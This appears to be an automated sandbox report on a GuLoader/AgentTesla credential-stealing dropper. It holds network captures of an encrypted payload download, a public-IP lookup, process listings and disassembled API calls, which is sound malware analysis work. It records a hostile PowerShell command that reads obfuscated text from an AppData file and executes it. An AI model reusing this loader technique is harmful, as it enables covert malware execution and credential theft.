Sep 25, 2024 12:09:07.525511980 CEST	1236	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Wed, 25 Sep 2024 08:57:18 GMT Accept-Ranges: bytes ETag: "255312ed28fdb1:0" Server: Microsoft-IIS/8.5 Date: Wed, 25 Sep 2024 10:09:05 GMT Content-Length: 241728 Data Raw: e2 5b 6d a6 6d 48 1f 83 31 45 b6 0f a8 a3 a6 12 af ce 14 f1 6e 4d 75 e6 c0 cd 0b d3 a3 de fa 28 3b 05 e8 2e 4e a2 0b 2f 52 d7 2e 67 51 cd c6 04 ec 97 16 dd 07 70 6d 96 9d 65 88 27 ca d1 8b de fb 20 db 23 10 6e 40 d5 02 5e 88 6e 89 62 50 97 54 fa 66 63 4d 19 b2 9a c3 6b d8 34 c2 ca 9a b3 ef 1b e1 bf e6 2f 01 d0 b4 42 8d 54 e8 4e 23 9f db cf 05 48 b6 c8 0f 86 d2 ed 67 ff 35 30 2c b3 cc 76 8c 31 52 5e 3c d6 a1 ef 60 a3 c2 80 78 8c cb 2a c1 71 c3 c3 41 38 81 89 5a 84 1d b3 9d 3f 55 fd 66 ce 70 b0 8a 12 48 2c 9d 04 28 83 e5 0a 19 f8 d6 56 e3 15 98 70 11 d7 37 d8 5e de 41 4f 42 98 8e 84 0d 9a 5e ad 7f 72 64 d9 e7 64 ad fc 39 4b b8 21 25 cd f8 15 9e f9 f3 6c 11 d5 30 fe a6 b9 b2 2a 25 84 4d b3 82 50 32 3e a8 e9 3f 3d f9 28 80 0d ba 81 e1 ef cf 0b eb 07 93 70 76 d4 88 43 2b 53 ae f3 f8 3f 68 79 fe 3b bc 56 4b 08 3e 61 fd 8a 45 cf 65 6a e7 96 45 47 8c c4 2d aa 7a 45 cf 8b 9e 54 ea 16 99 6e 7b 7e 13 56 73 86 82 cb 89 2d 8a 32 f0 75 44 20 ef ab f0 59 7a fd 93 c9 43 d9 09 60 0e 22 56 35 97 41 ee 31 74 d2 b4 3e [TRUNCATED] Data Ascii: [mmH1EnMu(;.N/R.gQpme' #n@^nbPTfcMk4/BTN#Hg50,v1R^<`xqA8Z?UfpH,(Vp7^AOB^rdd9K!%l0%MP2>?=(pvC+S?hy;VK>aEejEG-zETn{~Vs-2uD YzC`"V5A1t>I$GAgK?D(5~>#=C 4x}$PTIIRj_w]4-j+3?(Is[Xqbyjtk3?r4c206F.XgG3=#/uh3xt{ l:YIu[8.7)pyum_SP0:59[U?K'HN6d8tT%uo^5{D"~]:E&z3(Hpg?"Y\|zzniLc(3-BaV6jBcnmb%xwPvt#KM%,"dg\6rSr`2uHjLsw{)IqEzy}~z=y}!](X(P_x-u[U-5b?)KNK!VVGn%}md[B6>Zn9Pq6G]D>*dv8
Sep 25, 2024 12:09:07.525562048 CEST	1236	IN	Data Raw: b8 f6 ab b8 29 a5 91 be 89 ed 43 85 cb 7a 9b 36 1d 89 a3 c4 88 f0 74 1d 09 b6 35 0f 86 be d0 47 67 e4 ae 44 2d db 67 af b2 d6 70 34 9a c8 c4 58 cc e2 26 26 28 44 19 17 0d 77 00 2a 5d 87 5e 5e 4a 5b 9d de dd a9 89 35 ed d6 2a 65 1a 30 2a b1 c0 db Data Ascii: )Cz6t5GgD-gp4X&&(Dw]^^J[5e0*SnKuL(&a[WN)+8)NK-hGK#1#?u+p&poeE!oK",-L@>ZS<.8\P_em>$3
Sep 25, 2024 12:09:07.525576115 CEST	448	IN	Data Raw: 32 79 3a 2f ca 6d 13 b6 22 7b 1b 9a b5 9c 41 0c 0f fe 9b b0 43 49 2d 87 54 3d 6f d4 7a 97 ce bb 9c a4 b1 c6 14 77 65 de aa 39 d4 48 1f 32 1f b5 fe d8 d3 2c 4b f3 0b 99 e0 3e 00 a9 4d f1 fc e7 f2 81 20 c1 f4 b7 7b 2d 55 26 df a7 a8 67 0a e1 81 df Data Ascii: 2y:/m"{ACI-T=ozwe9H2,K>M {-U&g&bEf\y{3z9_+KXs2PEG>.)q\|yt`P^1>^V!o\%I*lMKhV'/A%$+Wp(#c$
Sep 25, 2024 12:09:07.525592089 CEST	1236	IN	Data Raw: 5a 0f 8d f6 c5 18 c9 b4 fb 90 f2 b3 3c 00 54 23 32 df ab 08 03 0f 15 0f 25 70 b0 88 40 77 62 47 e1 32 7b be 06 86 d9 79 e0 85 27 bc dc 17 fa 60 fe c2 70 2e 64 9c 78 43 c3 23 47 87 06 c2 aa 73 41 93 cb 61 54 2e 52 7d 9f 4a ba 1c dd a3 35 c7 25 22 Data Ascii: Z<T#2%p@wbG2{y'`p.dxC#GsAaT.R}J5%"i^\\|#Bc#^LUt0s6nNpbauP"';r;I0cHFs'?fU_*)>, EhFA66K5Q?1C2
Sep 25, 2024 12:09:07.525605917 CEST	1236	IN	Data Raw: ae 94 32 ab ac b6 e8 45 b8 79 f2 8b bd b1 db b3 58 47 1b 81 d3 a6 eb 98 16 9b fa ba fa 59 65 9f f6 ba 2d df cd a5 a4 fc ee b6 b2 10 c6 58 ca 48 70 a4 00 e3 9b 17 0b 75 83 fd 69 05 5e a7 48 df 35 78 df fc e1 7e ed a5 46 47 46 6e 08 c3 a3 f0 67 51 Data Ascii: 2EyXGYe-XHpui^H5x~FGFngQ47 'ltlMS,*u\|-=GNH:/=%-AL!5xjsDp"7/GO[/MZN;cR.`.Si$a;"2$
Sep 25, 2024 12:09:07.525619984 CEST	448	IN	Data Raw: 34 2e b7 da 13 b6 26 51 af 99 a4 85 41 0c 05 fc c9 aa 63 49 5d 51 b3 3f 6f d2 ae 85 ce c0 24 a6 b1 c2 3e ab 66 e4 d2 a1 d4 48 23 1d 55 b7 d6 f3 cc d3 be 0e 53 05 f1 3b 70 d4 a2 f1 fc e2 d8 9f 33 9a 6d b7 7b 29 81 0a da a4 ed a0 0a e1 85 f5 48 97 Data Ascii: 4.&QAcI]Q?o$>fH#US;p3m{)HqelQdzMgO_(c(-x:LP6.-W$SY/t3A^&FfInGIRV9=B^h$/}BGCmQUm
Sep 25, 2024 12:09:07.606007099 CEST	1236	IN	Data Raw: af dc d0 65 6d be 05 9a dc ad c0 76 f5 23 40 ce 81 2a 71 24 7f aa 25 7a 16 5c 52 76 19 c1 e5 32 7f 94 56 e7 da 04 36 27 d9 b4 f5 09 d0 03 59 c2 7a 58 21 be 7a 30 96 8d 47 87 04 16 bd 71 3a 49 b6 61 50 74 58 62 9c 37 18 34 ce a5 1f df fa db 4a 94 Data Ascii: emv#@q$%z\Rv2V6'YzX!z0Gq:IaPtXb74JiQ\xfm"j}BfZp1GIf%."1PKu@QOBYg,BtYV(h$i84Ej#J%6IG,y1,g
Sep 25, 2024 12:09:07.606035948 CEST	1236	IN	Data Raw: 2a a3 52 bd c7 13 92 65 ea 89 b7 8d ba 4f da e0 c7 91 d7 a4 ef 1b 42 9f fa 40 c6 41 67 e4 b5 d4 0b db e7 a5 6e 28 fc b5 9a 58 f1 58 cc 68 d8 a8 2e c4 a1 d7 0d 77 80 2b 50 01 5e 89 7c db 1d 54 23 f2 e3 54 71 b6 4b 45 15 6e 0b c3 a1 88 62 79 c6 36 Data Ascii: ReOB@Agn(XXh.w+P^\|T#TqKEnby6$\|`&qbSaPN/yL@)/3/65~ku/A/g7pE)x;_N7fP#.$^eSw#*$
Sep 25, 2024 12:09:07.606051922 CEST	1236	IN	Data Raw: a0 fa 13 b6 06 5e 51 98 9d 02 74 0c 05 fd 17 a5 62 49 7d ad bd 3d 6f 2c 5e 8a cc c0 fa a8 b2 c2 1e 51 67 dd d7 5f d5 71 03 18 55 b7 28 c7 d2 2c 61 f3 79 1e c1 4c 77 83 a0 81 5e c1 dd 9f 22 ba 93 b9 78 29 7f fa d1 a7 d5 de 06 e1 85 f5 48 9a 37 69 Data Ascii: ^QtbI}=o,^Qg_qU(,ayLw^"x)H7iEl4{R@w=9r}'cXP!MPo.-QQZy=q4i32_R+F^&n]HHjgG1cYH$\|/)Q+%
Sep 25, 2024 12:09:07.606065989 CEST	1236	IN	Data Raw: 0a d9 3e 6a 2e 37 39 28 90 63 79 75 15 b5 a8 13 8e 16 54 44 fa 53 50 f0 f2 1c 3a 90 f5 d2 35 ba 39 e9 b9 59 55 27 81 5e 6d 87 c1 ab 40 8f 06 91 a4 59 0c b9 ce f7 30 27 f3 b0 da 28 73 c1 b2 3c e4 87 38 11 e1 54 00 54 cb 0c d4 dd 25 d8 8e f8 cd 08 Data Ascii: >j.79(cyuTDSP:59YU'^m@Y0'(s<8TT%ul^z}"@.A :F]\mc7d~7<MZRmvg*0Q:h`5-tqIW3b,Be0!%y=Wt\|G[+H'hBi+dI]
Sep 25, 2024 12:09:07.606092930 CEST	896	IN	Data Raw: 6a 4d af 34 54 d2 b4 3e 0f 43 f9 9d 49 e2 cf 24 ae bd 3d 85 df ba c4 67 58 82 f7 b7 4f de 0b fc e3 99 47 33 44 ba 87 8a 9f 28 24 ff a2 a9 8c 35 ed 67 aa e4 7e cf be 18 9f 98 85 7b 23 f4 07 c3 11 43 20 14 0b 78 87 02 4c 0e 91 7d 0f 2f 1f a8 19 04 Data Ascii: jM4T>CI$=gXOG3D($5g~{#C xL}/zT9pRj7T]8f_FKF~[Xah)/whk?3rB2:Oh=g#V/t i l4iuMf*7lps3m_

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49738	104.26.13.205	443	6824	C:\Program Files (x86)\Windows Mail\wabmig.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-25 10:09:09 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-09-25 10:09:09 UTC	211	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 10:09:09 GMT Content-Type: text/plain Content-Length: 11 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8c8a37906e2c43e2-EWR
2024-09-25 10:09:09 UTC	11	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Target ID:	0
Start time:	06:07:56
Start date:	25/09/2024
Path:	C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe"
Imagebase:	0x400000
File size:	748'488 bytes
MD5 hash:	6C446FD0A3F6D498F5CBD0725CE7F232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	06:07:57
Start date:	25/09/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"powershell.exe" -windowstyle minimized "$Nasosubnasal=Get-Content 'C:\Users\user\AppData\Local\acneform\Dyssen.Mod';$Overwealthy=$Nasosubnasal.SubString(70317,3);.$Overwealthy($Nasosubnasal)"
Imagebase:	0xfb0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.2394657139.0000000008C11000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	06:07:57
Start date:	25/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	06:08:57
Start date:	25/09/2024
Path:	C:\Program Files (x86)\Windows Mail\wabmig.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\windows mail\wabmig.exe"
Imagebase:	0x2e0000
File size:	66'048 bytes
MD5 hash:	BBC90B164F1D84DEDC1DC30F290EC5F6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2945668788.0000000023C01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2945668788.0000000023C01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2945668788.0000000023C27000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	25.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	20.2%
Total number of Nodes:	1463
Total number of Limit Nodes:	46

Executed Functions

Function 73A91096 Relevance: 114.4, APIs: 56, Strings: 9, Instructions: 627
filestringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 73A91987: GetCurrentProcess.KERNEL32(?,?,00000000,?,?,?,73A910E0), ref: 73A91990
Part of subcall function 73A91987: GetModuleHandleA.KERNEL32(KERNEL32,?,?,00000000,?,?,?,73A910E0), ref: 73A9199E
Part of subcall function 73A91987: GetProcAddress.KERNEL32(00000000,?), ref: 73A919BD

GetModuleFileNameW.KERNEL32(?,00000104), ref: 73A910FA
GlobalAlloc.KERNEL32(00000040,?), ref: 73A91112
CharPrevW.USER32(?,?), ref: 73A9113D
GlobalFree.KERNEL32(00000000), ref: 73A91164
GetTempFileNameW.KERNEL32(?,73A93088,00000000,?), ref: 73A91182
CopyFileW.KERNEL32(?,?,00000000), ref: 73A91198
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 73A911B0
CreateFileMappingW.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 73A911BF
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 73A911CD
UnmapViewOfFile.KERNEL32(00000000), ref: 73A911F7
CloseHandle.KERNEL32(00000000), ref: 73A911FE
CloseHandle.KERNEL32(00000000), ref: 73A91205
lstrcatW.KERNEL32(?,73A93084), ref: 73A91214
lstrlenW.KERNEL32(?), ref: 73A9121B
GlobalAlloc.KERNEL32(00000040,?), ref: 73A9123C
FindWindowExW.USER32(0001043A,00000000,#32770,00000000), ref: 73A91274
FindWindowExW.USER32(00000000), ref: 73A91277
lstrcmpiW.KERNEL32(00000000,/OEM,00000000), ref: 73A912B0
lstrcmpiW.KERNEL32(00000000,/MBCS), ref: 73A912C5
DeleteFileW.KERNEL32(?,error), ref: 73A912FA
GetVersion.KERNEL32 ref: 73A91340
GlobalAlloc.KERNEL32(00000040,00000FFE), ref: 73A913B0
InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 73A913DE
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 73A913EF
CreatePipe.KERNELBASE(?,?,0000000C,00000000), ref: 73A91411
CreatePipe.KERNELBASE(?,?,0000000C,00000000), ref: 73A91424
GetStartupInfoW.KERNEL32(00000044), ref: 73A91431
CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,?), ref: 73A9147A
lstrcpyW.KERNEL32(?,error), ref: 73A91490
GetTickCount.KERNEL32 ref: 73A9149B
WaitForSingleObject.KERNEL32(?,00000000), ref: 73A914AB
GetExitCodeProcess.KERNELBASE(?,?), ref: 73A914BE
PeekNamedPipe.KERNELBASE(?,00000000,00000000,00000000,?,00000000), ref: 73A914CF
GetTickCount.KERNEL32 ref: 73A914DE
ReadFile.KERNEL32(?,00000000,00000400,?,00000000), ref: 73A91503
IsTextUnicode.ADVAPI32(73A930B8,?,00000000), ref: 73A91529
IsDBCSLeadByteEx.KERNEL32(?,?), ref: 73A9159D
MultiByteToWideChar.KERNEL32(?,00000000,73A930B8,00000001,?,00000002), ref: 73A915C4
lstrcpyW.KERNEL32(?, ), ref: 73A915F4
GlobalReAlloc.KERNEL32(00000002,00000402,00000042), ref: 73A91686

Part of subcall function 73A91948: CharNextExA.USER32(?,0000000A,00000000,73A930B8,?,73A916EA,?,00000002,00000002,0000000A), ref: 73A91974

lstrcpyW.KERNEL32(?,error), ref: 73A916F8
GetTickCount.KERNEL32 ref: 73A91716
TerminateProcess.KERNEL32(?,000000FF), ref: 73A9172D
lstrcpyW.KERNEL32(?,timeout), ref: 73A9173F
Sleep.KERNELBASE(00000064), ref: 73A9174C
lstrcpyW.KERNEL32(?,error), ref: 73A9179C
wsprintfW.USER32 ref: 73A917BA
CloseHandle.KERNEL32(?,?), ref: 73A917D8
CloseHandle.KERNEL32(?), ref: 73A917E0
CloseHandle.KERNEL32(?), ref: 73A917E5
CloseHandle.KERNEL32(?), ref: 73A917EA
CloseHandle.KERNEL32(?), ref: 73A917EF
CloseHandle.KERNEL32(?), ref: 73A917F4
DeleteFileW.KERNEL32(?), ref: 73A9180A
GlobalFree.KERNEL32(?), ref: 73A91819
GlobalFree.KERNEL32(00000002), ref: 73A91823

Strings

, xrefs: 73A915EC
SysListView32, xrefs: 73A91266
/MBCS, xrefs: 73A912BF
timeout, xrefs: 73A91739
error, xrefs: 73A91159, 73A912DC, 73A9148A, 73A916F2, 73A91796
/TIMEOUT=, xrefs: 73A9128A
D, xrefs: 73A91313
#32770, xrefs: 73A9126D
/OEM, xrefs: 73A912AA

Memory Dump Source

Source File: 00000000.00000002.1701148820.0000000073A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 73A90000, based on PE: true

Associated: 00000000.00000002.1701090358.0000000073A90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1701169618.0000000073A92000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1701225152.0000000073A93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1701247983.0000000073A94000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73a90000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: File$Handle$Close$Global$Createlstrcpy$AllocProcess$CharCountFreePipeTick$ByteDeleteDescriptorFindModuleNameSecurityViewWindowlstrcmpi$AddressCodeCopyCurrentDaclExitInfoInitializeLeadMappingMultiNamedNextObjectPeekPrevProcReadSingleSleepStartupTempTerminateTextUnicodeUnmapVersionWaitWidelstrcatlstrlenwsprintf
String ID: $#32770$/MBCS$/OEM$/TIMEOUT=$D$SysListView32$error$timeout
API String ID: 351676774-2772347907
Opcode ID: 924b82c5b415ad69fb06f15279b887df5a8ea9f1ba528186183951e71b7777ab
Instruction ID: 637e36d48234b509fe6dd83c6be6c8eed5ddec0159c8fd92c1edef953769652e
Opcode Fuzzy Hash: 924b82c5b415ad69fb06f15279b887df5a8ea9f1ba528186183951e71b7777ab
Instruction Fuzzy Hash: 7A323A72D0020DEFEB119FA5C986B9DBBF9FF08344F16406AE50AB6284DB305A45CF54

Function 00403532 Relevance: 84.5, APIs: 32, Strings: 16, Instructions: 464
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 00403555
GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 00403580
GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 00403593
lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 0040362C
#17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403669
OleInitialize.OLE32(00000000), ref: 00403670
SHGetFileInfoW.SHELL32(0042AA28,00000000,?,000002B4,00000000), ref: 0040368F
GetCommandLineW.KERNEL32(00433700,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004036A4
CharNextW.USER32(00000000,"C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe",00000020,"C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe",00000000,?,00000008,0000000A,0000000C), ref: 004036DD
GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403815
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403826
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403832
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403846
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040384E
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040385F
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403867
DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040387B
lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe",00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403954

Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564

wsprintfW.USER32 ref: 004039B1
GetFileAttributesW.KERNEL32(00437800,C:\Users\user\AppData\Local\Temp\), ref: 004039E4
DeleteFileW.KERNEL32(00437800), ref: 004039F0
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403A1E

Part of subcall function 00406317: MoveFileExW.KERNEL32(?,?,00000005,00405E15,?,00000000,000000F1,?,?,?,?,?), ref: 00406321

CopyFileW.KERNEL32(C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe,00437800,00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403A34

Part of subcall function 00405B3A: CreateProcessW.KERNELBASE(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B63
Part of subcall function 00405B3A: CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B70

Part of subcall function 004068B4: FindFirstFileW.KERNELBASE(74DF3420,0042FAB8,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,00405F77,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 004068BF
Part of subcall function 004068B4: FindClose.KERNEL32(00000000), ref: 004068CB

OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A82
ExitProcess.KERNEL32 ref: 00403A9F
CloseHandle.KERNEL32(00000000,00438000,00438000,?,00437800,00000000), ref: 00403AA6
GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403AC2
OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403AC9
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403ADE
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403B01
ExitWindowsEx.USER32(00000002,80040002), ref: 00403B26
ExitProcess.KERNEL32 ref: 00403B49

Part of subcall function 00405B05: CreateDirectoryW.KERNELBASE(?,00000000,00403525,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405B0B

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040380A, 0040380F, 00403825, 00403831, 00403840, 0040384D, 00403859, 00403861, 0040394F, 004039D0, 004039FC, 00403A1D, 00403A26
"C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe", xrefs: 004036AA, 004036B0, 004036C5, 004038A3
TEMP, xrefs: 0040385A
~nsu%X.tmp, xrefs: 004039A8
TMP, xrefs: 00403862
SeShutdownPrivilege, xrefs: 00403AD8
C:\Users\user\AppData\Local\acneform, xrefs: 00403927
C:\Users\user\Desktop, xrefs: 00403972
C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe, xrefs: 00403A2F
NSIS Error, xrefs: 00403695
Low, xrefs: 00403848
1033, xrefs: 00403876
\Temp, xrefs: 0040382C
UXTHEME, xrefs: 00403620, 00403625, 0040362B
C:\Users\user\AppData\Local\acneform, xrefs: 004037FA, 0040391C, 00403969, 00403977
Error launching installer, xrefs: 004038FD

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
String ID: "C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\acneform$C:\Users\user\AppData\Local\acneform$C:\Users\user\Desktop$C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
API String ID: 1813718867-67052804
Opcode ID: 2f58fbcc075b23529aa9588561da4342b8d2734b046618fffc698aa71994b29c
Instruction ID: 6c1349364f4d22fadfcc29bbd5f82b0434b4f5ba6e08f6571c64e8404a3f48da
Opcode Fuzzy Hash: 2f58fbcc075b23529aa9588561da4342b8d2734b046618fffc698aa71994b29c
Instruction Fuzzy Hash: 64F10270604301ABD320AF659D45B2B7AE8EF8570AF10483EF581B22D1DB7DDA45CB6E

Function 0040571B Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 00405779
GetDlgItem.USER32(?,000003EE), ref: 00405788
GetClientRect.USER32(?,?), ref: 004057C5
GetSystemMetrics.USER32(00000002), ref: 004057CC
SendMessageW.USER32(?,00001061,00000000,?), ref: 004057ED
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057FE
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405811
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040581F
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405832
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405854
ShowWindow.USER32(?,00000008), ref: 00405868
GetDlgItem.USER32(?,000003EC), ref: 00405889
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405899
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004058B2
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004058BE
GetDlgItem.USER32(?,000003F8), ref: 00405797

Part of subcall function 0040450B: SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519

GetDlgItem.USER32(?,000003EC), ref: 004058DB
CreateThread.KERNELBASE(00000000,00000000,Function_000056AF,00000000), ref: 004058E9
CloseHandle.KERNELBASE(00000000), ref: 004058F0
ShowWindow.USER32(00000000), ref: 00405914
